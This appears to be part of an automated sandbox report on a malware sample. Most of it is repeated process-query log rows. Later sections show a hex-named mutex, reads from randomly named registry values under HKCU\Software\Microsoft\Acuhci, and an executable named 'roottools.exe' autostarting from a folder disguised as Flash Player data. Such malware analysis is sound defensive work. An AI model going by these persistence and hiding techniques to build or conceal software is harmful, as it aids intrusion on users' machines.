| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:52, Reason: Autostart |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:05:21 |
| Information | Value |
|---|---|
| PID | 0x6a4 |
| Parent PID | 0x570 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6A8
0x
324
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
